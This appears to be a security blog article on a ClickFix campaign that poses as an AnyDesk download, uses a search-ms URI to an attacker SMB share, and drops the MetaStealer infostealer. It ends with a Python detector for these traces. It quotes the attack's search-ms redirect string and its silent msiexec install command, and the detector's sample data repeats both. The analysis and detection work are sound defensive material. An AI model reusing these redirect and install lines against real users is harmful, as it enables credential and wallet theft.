New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer

A novel variant of the ClickFix attack has recently emerged, masquerading as a legitimate AnyDesk installer to spread the MetaStealer infostealer.

This campaign exploits a fake Cloudflare Turnstile verification page to lure victims into executing a crafted Windows protocol handler, ultimately delivering a malicious MSI package disguised as a PDF.

As organizations continue to harden their defenses against traditional social-engineering techniques, threat actors are evolving their playbooks, blending familiar lures with unexpected system components to bypass detection and steal sensitive credentials.

In early August, users searching for the AnyDesk remote access tool encountered a deceptive landing page at anydeesk[.]ink/download/anydesk.html.

The page displayed what appeared to be a standard Cloudflare Turnstile prompt, complete with a “verify you are human” button.

Figure: The initial link that redirects users to a fake Cloudflare Turnstile (Source – Huntress)

Upon clicking, victims were not guided to paste a command into the Run dialog box as in classic ClickFix attacks but instead redirected into Windows File Explorer via the search-ms URI handler.

Huntress researchers noted that this subtle shift in redirection mechanism capitalized on the lesser-monitored Windows Search protocol, catching security teams off-guard.

Figure: Windows File Explorer redirection via search-ms (Source – Huntress)

The infection chain unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named “Readme Anydesk.pdf.lnk” to the victim’s system.

Unlike FileFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload, which in turn executes a script to download and install two components: the genuine AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]store.

The decoy file is in fact an MSI package whose download URL dynamically incorporates the victim’s hostname via the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed via:

msiexec /i "%TEMP%\%COMPUTERNAME%.msi" /quiet

After this command completes, metadata reveals two primary artifacts: a CustomActionDLL responsible for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.

Figure: Displayname parameter revealing the SMB share (Source – Huntress)

Huntress analysts identified that ls26.exe is protected with Private EXE Protector and exhibits characteristic behaviors of MetaStealer, including credential harvesting from browsers and crypto-wallet theft.

Infection Mechanism

At the heart of this campaign lies the ingenious use of Windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer.

The following URI snippet illustrates the redirection:

search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smbshare

Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.

The JavaScript file ensures the removal of intermediary files, while ls26.exe initiates the data exfiltration phase.

By abusing legitimate Windows protocols and file handling, this attack evades sandbox detection and security alerts until the final payload unleashes its malicious logic.

This emerging tactic underscores the importance of monitoring unconventional extensions of trusted system features.

Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social-engineering campaigns.
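As an added example (not code from the article, from Huntress, or from any vendor tool), the following Python script shows the kind of contextual check the previous paragraph calls for, applied to the search-ms URI shown in the Infection Mechanism section. It parses search-ms: URIs out of process command lines and flags any whose location crumb points at a remote share rather than a local folder, flags silent msiexec installs sourced from the user's Temp folder (including the unexpanded %TEMP%\%COMPUTERNAME%.msi form), and flags shortcut files carrying a document-style double extension such as .pdf.lnk. The telemetry lines, hostnames and paths are constructed for the example; the detection names are my own labels.

```python
import re
from urllib.parse import unquote

# Constructed sample telemetry (not from the article): process command lines as an
# EDR or Sysmon process-creation feed might record them. Hosts and paths are made up.
SAMPLE_EVENTS = [
    # search-ms URI whose location crumb points at a remote UNC share (the article's pattern)
    'explorer.exe "search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\\\attacker-smbshare"',
    # benign search-ms URI scoped to a local folder
    'explorer.exe "search-ms:displayname=Documents;crumb=location:C:\\Users\\alice\\Documents"',
    # silent MSI install from the user's Temp folder, file named after the host
    'msiexec /i "C:\\Users\\alice\\AppData\\Local\\Temp\\WS-1234.msi" /quiet',
    # same command with the environment variables still unexpanded
    'msiexec /i "%TEMP%\\%COMPUTERNAME%.msi" /quiet',
    # interactive install from Downloads: not flagged
    'msiexec /i "C:\\Users\\alice\\Downloads\\anydesk.msi"',
    # shortcut with a document-style double extension
    'explorer.exe "\\\\attacker-smbshare\\Readme Anydesk.pdf.lnk"',
]

SEARCH_MS_RE = re.compile(r'search-ms:[^"\s]+', re.I)


def parse_search_ms(uri):
    """Split a search-ms: URI into its parameters. Parameters are separated by
    ';' (as in the article's sample) or '&' (the documented form); each
    'crumb=' entry is returned as a (name, value) pair under 'crumbs'."""
    body = uri[len('search-ms:'):]
    parsed = {'crumbs': []}
    for part in re.split(r'[;&]', body):
        if not part:
            continue
        key, _, value = part.partition('=')
        value = unquote(value)          # undo %20-style encoding in displayname etc.
        if key.lower() == 'crumb':
            name, _, cval = value.partition(':')   # e.g. location:\\server\share
            parsed['crumbs'].append((name.lower(), cval))
        else:
            parsed[key.lower()] = value
    return parsed


def is_remote_location(location):
    """True when the location crumb names a share outside the host (UNC or file://)."""
    low = location.lower()
    return low.startswith('\\\\') or low.startswith('//') or low.startswith('file://')


def classify(cmdline):
    """Return the list of detection names that fire on one command line."""
    findings = []
    m = SEARCH_MS_RE.search(cmdline)
    if m:
        crumbs = parse_search_ms(m.group(0))['crumbs']
        if any(n == 'location' and is_remote_location(v) for n, v in crumbs):
            findings.append('search-ms-remote-share')
    if re.search(r'\bmsiexec(\.exe)?\b', cmdline, re.I):
        silent = re.search(r'\s/(quiet|qn|qb)\b', cmdline, re.I)
        from_temp = re.search(r'\\temp\\', cmdline, re.I) or '%temp%' in cmdline.lower()
        if silent and from_temp:
            findings.append('msiexec-quiet-from-temp')
    if re.search(r'\.(pdf|docx?|txt)\.lnk\b', cmdline, re.I):
        findings.append('double-extension-lnk')
    return findings


def scan(events):
    """Return (event, findings) for every event that triggers at least one detection."""
    return [(e, f) for e in events if (f := classify(e))]


if __name__ == '__main__':
    for event, findings in scan(SAMPLE_EVENTS):
        print(', '.join(findings), '<-', event)
```

The search-ms check keys on the location crumb rather than on the displayname, because the displayname is attacker-controlled text chosen to look legitimate (here "AnyDesk Secure Access") while a UNC location is the part that actually pulls content from outside the host; a search scoped to a local folder, as in the second sample, is left alone. The msiexec rule requires both a silent switch and a Temp-folder source so ordinary interactive installs from Downloads do not trip it.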


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.